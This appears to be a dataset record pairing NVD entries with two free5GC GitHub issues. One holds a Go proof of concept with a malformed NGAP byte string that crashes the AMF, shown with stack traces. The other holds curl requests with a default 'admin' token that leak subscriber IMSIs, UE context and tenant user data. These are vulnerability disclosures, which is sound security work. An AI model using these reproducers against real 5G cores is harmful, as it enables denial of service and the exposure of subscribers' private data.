2023-05-29T02:53:19Z
https://github.com/axiomatic-systems/Bento4/issues/761
1,377,242,122
761
CVE-2022-43677
2022-10-24T14:15:53.240
In free5GC 3.2.1, a malformed NGAP message can crash the AMF and NGAP decoders via an index-out-of-range panic in aper.GetBitString.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/free5gc/free5gc/issues/402" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.trendmicro.com/en_us/research/23/j/asn1-vulnerabilities-in-5g-cores.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "7EE8C66F-32FE-45C1-BC90-298A6B1469C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/free5gc/free5gc/issues/402
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "free5gc", "free5gc" ]
## Describe the bug A crafted malformed NGAP message can crash AMF and NGAP decoder ## To Reproduce run the program test.go can reproduce NGAP decoder crash: fisher@ubuntu:~/free5gc/NFs/amf/internal/ngap$ cat test.go ``` package main import ( ngap "github.com/free5gc/ngap" "fmt" ) func main() { data := []byte{0x00, 0x28, 0x00, 0x30, 0x00, 0x30, 0x30, 0x00, 0x12, 0x00, 0x20, 0x37, 0x37, 0x00, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30} _, err := ngap.Decoder(data) fmt.Println(err) } ``` fisher@ubuntu:~/free5gc/NFs/amf/internal/ngap$ go run test.go ``` panic: runtime error: index out of range [18446744073709551615] with length 29 goroutine 1 [running]: github.com/free5gc/aper.GetBitString(0xc0000181e3, 0x1d, 0x1d, 0x0, 0x0, 0x4f3420, 0x6390c0, 0xc00007e6e0, 0x4b, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:54 +0x2b2 github.com/free5gc/aper.GetBitsValue(0xc0000181e3, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:83 +0x5a github.com/free5gc/aper.(*perBitData).getBitsValue(0xc00009d140, 0x0, 0xc00009ba2f, 0x0, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:117 +0x7a github.com/free5gc/aper.(*perBitData).parseSemiConstrainedWholeNumber(0xc00009d140, 0x0, 0x1, 0x0, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:191 +0x111 github.com/free5gc/aper.(*perBitData).parseNormallySmallNonNegativeWholeNumber(0xc00009d140, 0xc00001c140, 0x36, 0x1) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:204 +0x71 github.com/free5gc/aper.(*perBitData).parseEnumerated(0xc00009d140, 0x4f2b01, 0xc000015098, 0xc0000150a0, 0x1, 0xc0000164e0, 0x22) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:530 +0x168 github.com/free5gc/aper.parseField(0x4f2b60, 0xc000015080, 0x18b, 0xc00009d140, 0x10000, 0x0, 0x0, 0xc000015098, 0xc0000150a0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:727 +0x1a3e github.com/free5gc/aper.parseField(0x507ca0, 0xc000015080, 0x199, 0xc00009d140, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0x4da0c0, 0xc000078200, 0x196, 0xc00009d140, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.parseField(0x538760, 0xc0000781c0, 0x199, 0xc00009d140, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0x4d70c0, 0xc000100050, 0x196, 0xc000089140, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.(*perBitData).parseOpenType(0xc00008acd0, 0x4d70c0, 0xc000100050, 0x196, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367 github.com/free5gc/aper.parseField(0x53db00, 0xc000100010, 0x199, 0xc00008acd0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99 github.com/free5gc/aper.parseField(0x52abe0, 0xc000100000, 0x199, 0xc00009ecd0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.(*perBitData).parseSequenceOf(0xc00009ecd0, 0x4ed800, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:591 +0x347 github.com/free5gc/aper.parseField(0x4ed860, 0xc00000c7e0, 0x197, 0xc00008acd0, 0x0, 0xc0000149b0, 0xc0000149b8, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:860 +0x190d github.com/free5gc/aper.parseField(0x5119a0, 0xc00000c7e0, 0x199, 0xc00009ecd0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0x514e20, 0xc00000c7e0, 0x199, 0xc00009ecd0, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0x4e4480, 0xc000012408, 0x196, 0xc00008acd0, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.(*perBitData).parseOpenType(0xc00008be90, 0x4e4480, 0xc000012408, 0x196, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367 github.com/free5gc/aper.parseField(0x546a00, 0xc000012390, 0x199, 0xc00008be90, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99 github.com/free5gc/aper.parseField(0x5236e0, 0xc000012380, 0x199, 0xc00009fe90, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0x4d9c80, 0xc00000c0e8, 0x196, 0xc000064e90, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.parseField(0x530d60, 0xc00000c0e0, 0x199, 0xc000064e90, 0x10000, 0x0, 0x0, 0xc0000140c0, 0xc0000140c8, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:819 +0xd9e github.com/free5gc/aper.UnmarshalWithParams(0xc00001c0c0, 0x34, 0x34, 0x4da3c0, 0xc00000c0e0, 0x54bdd9, 0x1c, 0x0, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:935 +0x1ce github.com/free5gc/ngap.Decoder(...) /home/fisher/go/pkg/mod/github.com/free5gc/ngap@v1.0.6/ngap.go:19 main.main() /home/fisher/free5gc/NFs/amf/internal/ngap/test.go:10 +0xd7 exit status 2 ``` When AMF receive this NGAP message will also crash ``` fisher@ubuntu:~/free5gc$ sudo ./bin/amf -c ./config/amfcfg.yaml -l ./log/20221014_091505/amf.log -lc ./log/20221014_091505/free5gc.log 2022-10-14T09:28:34Z [INFO][AMF][CFG] config version [1.0.3] 2022-10-14T09:28:34Z [INFO][AMF][Init] AMF Log level is set to [info] level 2022-10-14T09:28:34Z [INFO][LIB][NAS] set log level : info 2022-10-14T09:28:34Z [INFO][LIB][NAS] set report call : false 2022-10-14T09:28:34Z [INFO][LIB][NGAP] set log level : info 2022-10-14T09:28:34Z [INFO][LIB][NGAP] set report call : false 2022-10-14T09:28:34Z [INFO][LIB][FSM] set log level : info 2022-10-14T09:28:34Z [INFO][LIB][FSM] set report call : false 2022-10-14T09:28:34Z [INFO][LIB][Aper] set log level : info 2022-10-14T09:28:34Z [INFO][LIB][Aper] set report call : false 2022-10-14T09:28:34Z [INFO][AMF][App] amf 2022-10-14T09:28:34Z [INFO][AMF][App] AMF version: free5GC version: v3.2.1-13-ge104d46 build time: 2022-10-14T02:12:30Z commit hash: e839de03 commit time: 2022-08-25T12:35:10Z go version: go1.14.4 linux/amd64 2022-10-14T09:28:34Z [INFO][AMF][Init] Server started [GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production. - using env: export GIN_MODE=release - using code: gin.SetMode(gin.ReleaseMode) [GIN-debug] GET /namf-callback/v1/ --> github.com/free5gc/amf/internal/sbi/httpcallback.Index (4 handlers) [GIN-debug] POST /namf-callback/v1/smContextStatus/:guti/:pduSessionId --> github.com/free5gc/amf/internal/sbi/httpcallback.HTTPSmContextStatusNotify (4 handlers) [GIN-debug] POST /namf-callback/v1/am-policy/:polAssoId/update --> github.com/free5gc/amf/internal/sbi/httpcallback.HTTPAmPolicyControlUpdateNotifyUpdate (4 handlers) [GIN-debug] POST /namf-callback/v1/am-policy/:polAssoId/terminate --> github.com/free5gc/amf/internal/sbi/httpcallback.HTTPAmPolicyControlUpdateNotifyTerminate (4 handlers) [GIN-debug] POST /namf-callback/v1/n1-message-notify --> github.com/free5gc/amf/internal/sbi/httpcallback.HTTPN1MessageNotify (4 handlers) [GIN-debug] GET /namf-oam/v1/ --> github.com/free5gc/amf/internal/sbi/oam.Index (4 handlers) [GIN-debug] GET /namf-oam/v1/registered-ue-context --> github.com/free5gc/amf/internal/sbi/oam.HTTPRegisteredUEContext (4 handlers) [GIN-debug] GET /namf-oam/v1/registered-ue-context/:supi --> github.com/free5gc/amf/internal/sbi/oam.HTTPRegisteredUEContext (4 handlers) [GIN-debug] GET /namf-comm/v1/ --> github.com/free5gc/amf/internal/sbi/communication.Index (4 handlers) [GIN-debug] PUT /namf-comm/v1/subscriptions/:subscriptionId --> github.com/free5gc/amf/internal/sbi/communication.HTTPAMFStatusChangeSubscribeModify (4 handlers) [GIN-debug] DELETE /namf-comm/v1/subscriptions/:subscriptionId --> github.com/free5gc/amf/internal/sbi/communication.HTTPAMFStatusChangeUnSubscribe (4 handlers) [GIN-debug] PUT /namf-comm/v1/ue-contexts/:ueContextId --> github.com/free5gc/amf/internal/sbi/communication.HTTPCreateUEContext (4 handlers) [GIN-debug] POST /namf-comm/v1/ue-contexts/:ueContextId/assign-ebi --> github.com/free5gc/amf/internal/sbi/communication.HTTPEBIAssignment (4 handlers) [GIN-debug] POST /namf-comm/v1/ue-contexts/:ueContextId/transfer-update --> github.com/free5gc/amf/internal/sbi/communication.HTTPRegistrationStatusUpdate (4 handlers) [GIN-debug] POST /namf-comm/v1/ue-contexts/:ueContextId/release --> github.com/free5gc/amf/internal/sbi/communication.HTTPReleaseUEContext (4 handlers) [GIN-debug] POST /namf-comm/v1/ue-contexts/:ueContextId/transfer --> github.com/free5gc/amf/internal/sbi/communication.HTTPUEContextTransfer (4 handlers) [GIN-debug] DELETE /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-messages/subscriptions/:subscriptionId --> github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageUnSubscribe (4 handlers) [GIN-debug] POST /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-messages --> github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageTransfer (4 handlers) [GIN-debug] GET /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-messages/:n1N2MessageId --> github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageTransferStatus (4 handlers) [GIN-debug] POST /namf-comm/v1/ue-contexts/:ueContextId/n1-n2-messages/subscriptions --> github.com/free5gc/amf/internal/sbi/communication.HTTPN1N2MessageSubscribe (4 handlers) [GIN-debug] DELETE /namf-comm/v1/non-ue-n2-messages/subscriptions/:n2NotifySubscriptionId --> github.com/free5gc/amf/internal/sbi/communication.HTTPNonUeN2InfoUnSubscribe (4 handlers) [GIN-debug] POST /namf-comm/v1/non-ue-n2-messages/transfer --> github.com/free5gc/amf/internal/sbi/communication.HTTPNonUeN2MessageTransfer (4 handlers) [GIN-debug] POST /namf-comm/v1/non-ue-n2-messages/subscriptions --> github.com/free5gc/amf/internal/sbi/communication.HTTPNonUeN2InfoSubscribe (4 handlers) [GIN-debug] POST /namf-comm/v1/subscriptions --> github.com/free5gc/amf/internal/sbi/communication.HTTPAMFStatusChangeSubscribe (4 handlers) [GIN-debug] GET /namf-evts/v1/ --> github.com/free5gc/amf/internal/sbi/eventexposure.Index (4 handlers) [GIN-debug] DELETE /namf-evts/v1/subscriptions/:subscriptionId --> github.com/free5gc/amf/internal/sbi/eventexposure.HTTPDeleteSubscription (4 handlers) [GIN-debug] PATCH /namf-evts/v1/subscriptions/:subscriptionId --> github.com/free5gc/amf/internal/sbi/eventexposure.HTTPModifySubscription (4 handlers) [GIN-debug] POST /namf-evts/v1/subscriptions --> github.com/free5gc/amf/internal/sbi/eventexposure.HTTPCreateSubscription (4 handlers) [GIN-debug] GET /namf-mt/v1/ --> github.com/free5gc/amf/internal/sbi/mt.Index (4 handlers) [GIN-debug] GET /namf-mt/v1/ue-contexts/:ueContextId --> github.com/free5gc/amf/internal/sbi/mt.HTTPProvideDomainSelectionInfo (4 handlers) [GIN-debug] POST /namf-mt/v1/ue-contexts/:ueContextId/ue-reachind --> github.com/free5gc/amf/internal/sbi/mt.HTTPEnableUeReachability (4 handlers) [GIN-debug] GET /namf-loc/v1/ --> github.com/free5gc/amf/internal/sbi/location.Index (4 handlers) [GIN-debug] POST /namf-loc/v1/:ueContextId/provide-loc-info --> github.com/free5gc/amf/internal/sbi/location.HTTPProvideLocationInfo (4 handlers) [GIN-debug] POST /namf-loc/v1/:ueContextId/provide-pos-info --> github.com/free5gc/amf/internal/sbi/location.HTTPProvidePositioningInfo (4 handlers) 2022-10-14T09:28:34Z [INFO][AMF][Util] amfconfig Info: Version[1.0.3] Description[AMF initial local configuration] 2022-10-14T09:28:34Z [INFO][AMF][NGAP] Listen on 192.168.56.102:38412 2022-10-14T09:28:39Z [INFO][AMF][NGAP] [AMF] SCTP Accept from: 192.168.56.104/10.0.2.15/10.60.0.1/172.17.0.1:60710 2022-10-14T09:28:39Z [INFO][AMF][NGAP] Create a new NG connection for: 192.168.56.104/10.0.2.15/10.60.0.1/172.17.0.1:60710 panic: runtime error: index out of range [18446744073709551615] with length 29 goroutine 15 [running]: github.com/free5gc/aper.GetBitString(0xc0003d7e23, 0x1d, 0x1d, 0x0, 0x0, 0xcef9e0, 0x16a0560, 0xc000029b80, 0x4b, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:54 +0x2b2 github.com/free5gc/aper.GetBitsValue(0xc0003d7e23, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:83 +0x5a github.com/free5gc/aper.(*perBitData).getBitsValue(0xc000474f48, 0x0, 0xc000473837, 0x0, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:117 +0x7a github.com/free5gc/aper.(*perBitData).parseSemiConstrainedWholeNumber(0xc000474f48, 0x0, 0x1, 0x0, 0x0) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:191 +0x111 github.com/free5gc/aper.(*perBitData).parseNormallySmallNonNegativeWholeNumber(0xc000474f48, 0xc000452300, 0x36, 0x1) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:204 +0x71 github.com/free5gc/aper.(*perBitData).parseEnumerated(0xc000474f48, 0xcecf01, 0xc0004271e8, 0xc0004271f0, 0x1, 0xc00047a030, 0x22) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:530 +0x168 github.com/free5gc/aper.parseField(0xcecf20, 0xc0004271d0, 0x18b, 0xc000474f48, 0x10000, 0x0, 0x0, 0xc0004271e8, 0xc0004271f0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:727 +0x1a3e github.com/free5gc/aper.parseField(0xd5b980, 0xc0004271d0, 0x199, 0xc000474f48, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0xcadd80, 0xc0003dda80, 0x196, 0xc000474f48, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.parseField(0xe00ec0, 0xc0003dda40, 0x199, 0xc000474f48, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0xcaad80, 0xc000480050, 0x196, 0xc0000a8f48, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.(*perBitData).parseOpenType(0xc0000aaad8, 0xcaad80, 0xc000480050, 0x196, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367 github.com/free5gc/aper.parseField(0xe25140, 0xc000480010, 0x199, 0xc0000aaad8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99 github.com/free5gc/aper.parseField(0xdb7600, 0xc000480000, 0x199, 0xc000476ad8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.(*perBitData).parseSequenceOf(0xc000476ad8, 0xcd9a00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:591 +0x347 github.com/free5gc/aper.parseField(0xcd9a60, 0xc0003f9020, 0x197, 0xc0000aaad8, 0x0, 0xc000426af0, 0xc000426af8, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:860 +0x190d github.com/free5gc/aper.parseField(0xd65680, 0xc0003f9020, 0x199, 0xc000476ad8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0xd68b00, 0xc0003f9020, 0x199, 0xc000476ad8, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0xcb8140, 0xc0000e5208, 0x196, 0xc0000aaad8, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.(*perBitData).parseOpenType(0xc0000abc98, 0xcb8140, 0xc0000e5208, 0x196, 0x10000, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:668 +0x367 github.com/free5gc/aper.parseField(0xe60ce0, 0xc0000e5190, 0x199, 0xc0000abc98, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:805 +0xa99 github.com/free5gc/aper.parseField(0xdb0100, 0xc0000e5180, 0x199, 0xc000477c98, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:853 +0x14ae github.com/free5gc/aper.parseField(0xcad940, 0xc0003f8928, 0x196, 0xc00040bc98, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:686 +0x228f github.com/free5gc/aper.parseField(0xddb1c0, 0xc0003f8920, 0x199, 0xc00040bc98, 0x10000, 0x0, 0x0, 0xc000426210, 0xc000426218, 0x0, ...) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:819 +0xd9e github.com/free5gc/aper.UnmarshalWithParams(0xc000454000, 0x34, 0x2000, 0xcae080, 0xc0003f8920, 0xe882ed, 0x1c, 0xc0002f8ce0, 0x6) /home/fisher/go/pkg/mod/github.com/free5gc/aper@v1.0.4/aper.go:935 +0x1ce github.com/free5gc/ngap.Decoder(...) /home/fisher/go/pkg/mod/github.com/free5gc/ngap@v1.0.6/ngap.go:19 github.com/free5gc/amf/internal/ngap.Dispatch(0x1000660, 0xc0004231f0, 0xc000454000, 0x34, 0x2000) /home/fisher/free5gc/NFs/amf/internal/ngap/dispatcher.go:30 +0x11a github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0004231f0, 0x2000, 0xeaf6d8, 0xeaf6e0) /home/fisher/free5gc/NFs/amf/internal/ngap/service/service.go:204 +0x700 created by github.com/free5gc/amf/internal/ngap/service.listenAndServe /home/fisher/free5gc/NFs/amf/internal/ngap/service/service.go:136 +0xc43 ``` ## Expected behavior No crash of AMF and NGAP decoder ## Environment (please complete the following information): - free5GC Version: v3.2.1-13-ge104d46 - OS: Ubuntu 20.04 Server - Kernel version: 5.4.0-91-generic - go version: go1.14.4 linux/amd64 - c compiler version (Option): gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 ### PCAP File https://raw.githubusercontent.com/fisherwky/shared/main/crafted_malformed_ngap_message_make_amf_crash.pcap
[Bugs] A crafted malformed NGAP message can crash AMF and NGAP decoder
https://api.github.com/repos/free5gc/free5gc/issues/402/comments
8
2022-10-14T10:06:34Z
2023-06-14T11:10:02Z
https://github.com/free5gc/free5gc/issues/402
1,409,103,155
402
CVE-2022-38870
2022-10-25T17:15:55.773
Free5gc v3.2.1 is vulnerable to Information disclosure.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/free5gc/free5gc/issues/387" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "7EE8C66F-32FE-45C1-BC90-298A6B1469C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/free5gc/free5gc/issues/387
[ "Exploit", "Third Party Advisory" ]
github.com
[ "free5gc", "free5gc" ]
## Bug Description Free5gc webconsole come with a default username Admin and by using this username as a token header and without any password or authentication ,it's possible to leak all the information below : - Registered UEs (plmnID,ueId) - Subscriber information (AccessType,CmState,Guti,Mcc,Mnc,Dnn,PduSessionId,Sd,SmContextRef,Sst,Supi,Tac) - Tenant and User ## Steps To Reproduce - Leaking the subscriber list: ``` $ curl 'http://172.27.65.183:30500/api/subscriber' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://172.27.65.183:30500/' -H 'Connection: keep-alive' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' [{"plmnID":"20893","ueId":"imsi-208930000000003"}] ``` - Using the gathered IMSI to get the Registred UE info: ``` $ curl 'http://172.27.65.183:30500/api/registered-ue-context/imsi-208930000000003' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Connection: keep-alive' -H 'Referer: http://172.27.65.183:30500/' [{"AccessType":"3GPP_ACCESS","CmState":"IDLE","Guti":"20893cafe0000000014","Mcc":"208","Mnc":"93","PduSessions":[{"Dnn":"internet","PduSessionId":"1","Sd":"010203","SmContextRef":"urn:uuid:d303dc78-b85a-4071-9e47-1e86e94b1773","Sst":"1"}],"Supi":"imsi-208930000000003","Tac":"000001"}] ``` - Leaking tenant information ``` $ curl 'http://172.27.65.183:30500/api/tenant' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Connection: keep-alive' -H 'Referer: http://172.27.65.183:30500/' [{"tenantId":"95e76759-cf0b-4c4f-8e93-393db0fbe503","tenantName":"test"} ``` - Using the gathered tenant id to get users inforamtions on a specific tenant: ``` $ curl 'http://172.27.65.183:30500/api/tenant/95e76759-cf0b-4c4f-8e93-393db0fbe503/user' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Connection: keep-alive' -H 'Referer: http://172.27.65.183:30500/' [{"userId":"715d2157-66c9-4885-b57c-48211010e237","tenantId":"95e76759-cf0b-4c4f-8e93-393db0fbe503","email":"test@test.test","encryptedPassword":""}] ``` ## Environment : - free5GC Version: v3.2.1 - OS: Ubuntu 22.04 ## Risk and Impact Risk : RISK_INFRASTRUCTURE_INFO_LEAK Impact: TECH_IMPACT_INFO_DISCLOSURE ``` * Financial impact: None or not known. * Confidentiality impact: High: It is possible to an attacker to leak Registered UEs (plmnID,ueId),Subscriber information (AccessType,CmState,Guti,Mcc,Mnc,Dnn,PduSessionId,Sd,SmContextRef,Sst,Supi,Tac) , Tenant and User * Integrity impact: None or not known. * Availability impact: None or not known. CVSS Base Score: 7.5 Impact Subscore: 3.6 Exploitability Subscore: 3.9 CVSS Temporal Score: 7.5 CVSS Environmental Score: 7.5 CVSS v3 Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X) https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X ``` ## Proposed Fix: Consider generating a complex random token and give it an expiration date.
[Bugs] Leaking Registered UEs,Subscriber information,Tenants and User via the Free5gc webconsole without authentication
https://api.github.com/repos/free5gc/free5gc/issues/387/comments
4
2022-08-24T10:47:13Z
